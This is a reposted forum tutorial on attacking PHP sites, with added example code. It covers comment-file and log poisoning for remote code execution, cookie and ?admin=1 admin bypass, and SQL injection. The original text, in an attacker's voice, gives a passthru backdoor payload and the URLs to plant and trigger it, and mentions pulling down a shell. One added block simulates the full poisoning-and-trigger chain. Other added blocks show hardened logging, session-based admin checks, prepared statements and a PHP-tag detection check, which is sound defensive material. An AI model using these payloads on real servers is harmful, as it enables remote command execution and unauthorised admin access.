We will start with a PHP comment form whose handler, submit.php, appends whatever is posted to a file.
Code:
<form method="POST" action="">
  <textarea rows="10" name="comments" cols="60"></textarea>
  <p><input type="submit" value="Post" name="sub"></p>
</form>
Code:
<?php
// submit.php: appends the raw POST body to comments.php, a file PHP will parse and execute on the next request
$comments = $_POST['comments'];
$log = fopen('comments.php', 'a');
fwrite($log, '<br /><br /><center>Comments::<br />' . $comments);
fclose($log);
?>
This lets us execute our own code, which is extremely awesome, for lack of a better term: whatever we type into the textarea is appended unfiltered to comments.php, so a PHP tag in a comment runs the next time anyone requests that file. We can use it to get server details with phpinfo(), drop a shell, or pretty much anything :P
The second pattern is an error page that takes its message from a GET parameter and logs it together with the visitor's IP. This is a common mistake.
Okay, so let's assume that info.php has the code:
Code:
<?php
// info.php: writes the raw msg parameter and the client IP into errorlog.php, which PHP will execute when requested
$msg = $_GET['msg'];
$ip = getenv('REMOTE_ADDR');
$error = fopen('errorlog.php', 'a');
fwrite($error, '<br />' . $msg . '<br />' . $ip . '<br />');
fclose($error);
?>
This lets a remote attacker (you) poison the log file and inject code into it. I will also cover another weak spot of the same kind, cookie poisoning, which gets you into the admin area without any code execution at all.
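Both submit.php and info.php make the same mistake: user input is written, byte for byte, into a file with a .php extension under the web root. The block below is an added example, not code from the original post; it puts the page's info.php pattern beside a hardened logger and a small triage check a defender can run over an existing log. The directory /var/log/myapp is an assumption (any writable directory outside the web root will do; the demo uses the system temp dir).

```php
<?php
// Added example, not from the original post. Assumption: the log directory lives outside the web root.

// VULNERABLE: the pattern from info.php on the page. $msg lands verbatim in a file PHP will later execute.
function logErrorVulnerable(string $file, string $msg, string $ip): void {
    $h = fopen($file, 'a');                 // e.g. 'errorlog.php', reachable by URL
    fwrite($h, '<br />' . $msg . '<br />' . $ip . '<br />');
    fclose($h);
}

// HARDENED: three independent fixes, any one of which breaks the poisoning chain.
//  1. The log is plain data (.log) outside the web root, so no URL makes PHP parse it.
//  2. The message is length-limited and HTML-encoded, so "<?php" never reaches the file as raw bytes.
//  3. The file is appended with an exclusive lock and is never include()d or require()d anywhere.
function logErrorHardened(string $dir, string $msg, string $ip): string {
    $safeMsg = htmlspecialchars(substr($msg, 0, 200), ENT_QUOTES, 'UTF-8');
    $safeIp  = filter_var($ip, FILTER_VALIDATE_IP) ?: 'invalid';
    $line    = sprintf("%s %s %s\n", date('c'), $safeIp, $safeMsg);
    file_put_contents($dir . '/errors.log', $line, FILE_APPEND | LOCK_EX);
    return $line;
}

// Triage check for an existing log: return every PHP open tag found in its contents.
function findPhpTags(string $contents): array {
    preg_match_all('/<\?(php|=)?/i', $contents, $m);
    return $m[0];
}

// Constructed sample input: the payload an attacker would send as ?msg=...
$payload = "<?php passthru(\$_GET['attacker']); ?>";
$ip      = '203.0.113.7';   // constructed sample address

echo "hardened log line : " . logErrorHardened(sys_get_temp_dir(), $payload, $ip);
echo "tags in raw input : " . count(findPhpTags($payload)) . "\n";
echo "tags after encode : " . count(findPhpTags(htmlspecialchars($payload, ENT_QUOTES, 'UTF-8'))) . "\n";
```

The encoding step is what neutralises the page's payload (the `<` becomes `&lt;`), but on its own it is not enough: moving the log out of the web root and off the .php extension is what removes the execution sink, and that is the fix to apply first.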
Code:
<?php
require("config.php");
// any request carrying a cookie named "admin" skips the redirect, whatever the cookie's value is
if (!isset($_COOKIE['admin'])) {
    header("Location:admin.php?user=admin");
}
?>
Another example that does roughly the same thing, this time using a GET parameter to check a user's status:
Code:
<?php
$admin = $_GET['admin'];
// the "privilege check" is a comparison against a value the client chose
if ($admin == 1) {
    $queryxyz = "SELECT * from user where username='$admin'";   // $admin goes straight into the SQL
    header("Location:admin/admin.php");
}
?>
admin=1 ;) And the query hands us another possible vulnerability on top: SQL injection, since $admin is concatenated into it unescaped.
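Both the cookie check and the GET check trust a value the client controls, and the lookup that follows trusts it a second time inside the SQL. As an added example (not code from the original post), here are those two checks beside a version where the admin decision comes from the server-side session and the query uses a bound parameter. The user table layout, the is_admin column and the in-memory SQLite database are assumptions for the offline demo; in production the PDO DSN points at the real database and $_SESSION is populated at login.

```php
<?php
// Added example, not from the original post. Assumptions: pdo_sqlite is available for the demo,
// and a user table with (username, is_admin) exists.

// VULNERABLE (as on the page): the admin decision is made from client-supplied values.
function isAdminVulnerable(array $cookie, array $get): bool {
    if (isset($cookie['admin'])) {
        return true;                                  // any cookie named "admin" will do
    }
    return isset($get['admin']) && $get['admin'] == 1; // ?admin=1
}

// VULNERABLE (as on the page): the username is interpolated into the SQL string.
function findUserVulnerable(PDO $db, string $username): array {
    $sql = "SELECT * FROM user WHERE username='$username'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// HARDENED: bound parameter, so quotes in the input stay data.
function findUser(PDO $db, string $username): ?array {
    $st = $db->prepare('SELECT username, is_admin FROM user WHERE username = :u');
    $st->execute([':u' => $username]);
    $row = $st->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// HARDENED: the flag lives in the server-side session, which the client cannot edit.
// The session is filled in at login after password_verify(); the browser only holds an opaque session ID.
function isAdmin(array $session): bool {
    return !empty($session['user']) && (int) $session['user']['is_admin'] === 1;
}

// --- offline demo on an in-memory SQLite database with constructed rows ---
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE user (username TEXT, is_admin INTEGER)');
$db->exec("INSERT INTO user VALUES ('admin', 1), ('bob', 0)");

$injected = "' OR '1'='1";   // constructed injection string: turns the WHERE clause into a tautology

echo "vulnerable check with ?admin=1   : " . var_export(isAdminVulnerable([], ['admin' => '1']), true) . "\n";
echo "vulnerable check with any cookie : " . var_export(isAdminVulnerable(['admin' => 'x'], []), true) . "\n";
echo "session check, nobody logged in  : " . var_export(isAdmin([]), true) . "\n";
echo "rows from interpolated query     : " . count(findUserVulnerable($db, $injected)) . "\n";
echo "rows from prepared query         : " . (findUser($db, $injected) === null ? 0 : 1) . "\n";
```

The interpolated query returns the whole table for the injected username because the quote closes the literal early; the prepared statement looks for a user literally named `' OR '1'='1` and finds nothing.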
RCE is also possible through request headers that get logged (the same poisoning trick, delivered in a header such as User-Agent instead of a parameter) or through an arbitrary file upload, when there is a file-processing system that does not sanitize what it receives.
How can an attacker take advantage of this vulnerability and exploit it?
I guess I'll tell you.
So, let's say a hacker learns that a GET variable is being written to a log file. First we, the hackers, need to locate that log file; a wordlist of likely paths is the usual way. Then we inject a harmless piece of PHP to check whether the output is filtered. For our example we'll assume it is not, so we are in luck and should go for a shell. This is how we would do that:
http://www.example.com/info.php?msg=<?php passthru($_GET['attacker']); ?>
(URL-encode the payload in the real request; the `?` and `<` characters otherwise get in the way.) That poisons the log file with a backdoor: from now on every request to errorlog.php runs whatever is in the attacker parameter as a system command, which you can use to pull down a shell. Probably somewhere like:
http://www.example.com/errorlog.php?attacker=id
(or a command that downloads your shell; Mulci is mine)
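To make the chain above concrete without a web server, here is an added example (not from the original post) that simulates it end to end: it builds the URL-encoded poisoning request, runs it through the page's info.php logic into a temporary errorlog .php file, and then include()s that file the way a request to errorlog.php would, with the attacker parameter set. The parameter name attacker comes from the page; the temp directory, the sample IP and the harmless `echo poisoned` command are assumptions for the demo.

```php
<?php
// Added example, not from the original post. Assumptions: 'attacker' is the parameter name from the page,
// the temp dir is writable, and passthru() is not listed in disable_functions (if it is, the trigger prints nothing).

// Step 1: the poisoning request. The PHP tag must be URL-encoded, otherwise the '?' and '&'
// inside it are treated as query-string syntax and the tag arrives mangled.
function poisonUrl(string $param): string {
    $tag = "<?php passthru(\$_GET['$param']); ?>";
    return 'http://www.example.com/info.php?msg=' . rawurlencode($tag);
}

// Step 2: what info.php on the page does with it (file name made a parameter, logic unchanged).
function vulnerableLog(string $file, string $msg, string $ip): void {
    $h = fopen($file, 'a');
    fwrite($h, '<br />' . $msg . '<br />' . $ip . '<br />');
    fclose($h);
}

// Step 3: a request to errorlog.php?attacker=<cmd> makes PHP parse the poisoned file.
// include() of that file reproduces the same thing offline; output buffering captures what it prints.
function triggerBackdoor(string $file, string $param, string $cmd): string {
    $_GET[$param] = $cmd;
    ob_start();
    include $file;
    return ob_get_clean();
}

$tmp = tempnam(sys_get_temp_dir(), 'errorlog');
$log = $tmp . '.php';                         // the extension is what makes the log executable

$url = poisonUrl('attacker');
// The web server URL-decodes the query string before $_GET['msg'] is populated; parse_str does the same here.
parse_str((string) parse_url($url, PHP_URL_QUERY), $q);
vulnerableLog($log, $q['msg'], '203.0.113.7');   // constructed sample client IP

echo "poisoning request : $url\n";
echo "log file contents : " . file_get_contents($log) . "\n";
echo "trigger output    : " . triggerBackdoor($log, 'attacker', 'echo poisoned') . "\n";

unlink($log);
unlink($tmp);
```

The trigger output still carries the `<br />` markup around the command result, which is the giveaway when you look at a poisoned page: the log line renders as usual, with the command output sitting where the logged message should be.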
In other cases, like the `$admin == 1` check in the earlier example, exploitation is even easier: the attacker just spoofs the variable admin. http://www.example.com/file.php?admin=1
Same thing for the cookie: just add or edit the admin cookie.
Source: http://forum.intern0t.org/web-hacking-war-games/2924-remote-code-execution.html